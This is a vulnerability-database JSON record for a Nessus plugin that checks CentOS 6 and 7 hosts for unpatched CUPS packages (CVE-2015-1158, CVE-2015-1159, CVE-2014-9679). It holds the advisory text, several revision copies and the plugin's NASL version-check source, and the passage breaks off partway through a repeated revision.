{"id": "CENTOS_RHSA-2015-1123.NASL", "bulletinFamily": "scanner", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "published": "2015-06-19T00:00:00", "modified": "2018-11-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "reporter": "Tenable", "references": ["http://www.nessus.org/u?646be46a", "http://www.nessus.org/u?124ba55b"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "type": "nessus", "lastseen": "2018-11-11T12:57:22", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 4, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "ce877bbb6c25e76f767332e5218885fcf884b60bcbc768cb49bbef4bcd08a045", "hashmap": [{"hash": "9fe7fac5643c2de42bab95a37df308be", "key": "published"}, {"hash": "847f43a92eb93c9e57c16d87c9b61f7c", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a303b6c8ee4f399e2b408d8aa372af", "key": "description"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "883afaca71e4c27b13b077c8f0d80806", "key": "href"}, {"hash": "52b779c6cb4db7f4867db45da7a5d907", "key": "pluginID"}, {"hash": "212e625ef8cc5028a93a91290153dca0", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "28c8e8fb0a1a6b2926bc5fd729ee5bd4", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "20a3b22f38036d445be91ac3db867352", "key": "cvelist"}, {"hash": "164a4115e940e28685331ff6cf8244a3", "key": "title"}, {"hash": "c5bff0491c78f8e2241f90164d8cbe6f", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "id": "CENTOS_RHSA-2015-1123.NASL", "lastseen": "2018-08-30T19:49:01", "modified": "2018-07-02T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "84276", "published": "2015-06-19T00:00:00", "references": ["http://www.nessus.org/u?96f7741b", "http://www.nessus.org/u?3ed2b6f9"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ed2b6f9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96f7741b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "type": "nessus", "viewCount": 8}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:49:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 5, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "dfa00afef9a663fd54dd61b1a77182fc526a06370d1cf5a59990d00a95cfed8c", "hashmap": [{"hash": "9fe7fac5643c2de42bab95a37df308be", "key": "published"}, {"hash": "847f43a92eb93c9e57c16d87c9b61f7c", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a303b6c8ee4f399e2b408d8aa372af", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "883afaca71e4c27b13b077c8f0d80806", "key": "href"}, {"hash": "52b779c6cb4db7f4867db45da7a5d907", "key": "pluginID"}, {"hash": "212e625ef8cc5028a93a91290153dca0", "key": "references"}, {"hash": "28c8e8fb0a1a6b2926bc5fd729ee5bd4", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "20a3b22f38036d445be91ac3db867352", "key": "cvelist"}, {"hash": "164a4115e940e28685331ff6cf8244a3", "key": "title"}, {"hash": "c5bff0491c78f8e2241f90164d8cbe6f", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "id": "CENTOS_RHSA-2015-1123.NASL", "lastseen": "2018-09-01T23:56:00", "modified": "2018-07-02T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "84276", "published": "2015-06-19T00:00:00", "references": ["http://www.nessus.org/u?96f7741b", "http://www.nessus.org/u?3ed2b6f9"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ed2b6f9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96f7741b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "type": "nessus", "viewCount": 9}, "differentElements": ["sourceData"], "edition": 5, "lastseen": "2018-09-01T23:56:00"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 3, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "dfa00afef9a663fd54dd61b1a77182fc526a06370d1cf5a59990d00a95cfed8c", "hashmap": [{"hash": "9fe7fac5643c2de42bab95a37df308be", "key": "published"}, {"hash": "847f43a92eb93c9e57c16d87c9b61f7c", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a303b6c8ee4f399e2b408d8aa372af", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "883afaca71e4c27b13b077c8f0d80806", "key": "href"}, {"hash": "52b779c6cb4db7f4867db45da7a5d907", "key": "pluginID"}, {"hash": "212e625ef8cc5028a93a91290153dca0", "key": "references"}, {"hash": "28c8e8fb0a1a6b2926bc5fd729ee5bd4", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "20a3b22f38036d445be91ac3db867352", "key": "cvelist"}, {"hash": "164a4115e940e28685331ff6cf8244a3", "key": "title"}, {"hash": "c5bff0491c78f8e2241f90164d8cbe6f", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "id": "CENTOS_RHSA-2015-1123.NASL", "lastseen": "2018-07-03T10:04:45", "modified": "2018-07-02T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "84276", "published": "2015-06-19T00:00:00", "references": ["http://www.nessus.org/u?96f7741b", "http://www.nessus.org/u?3ed2b6f9"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ed2b6f9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96f7741b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n 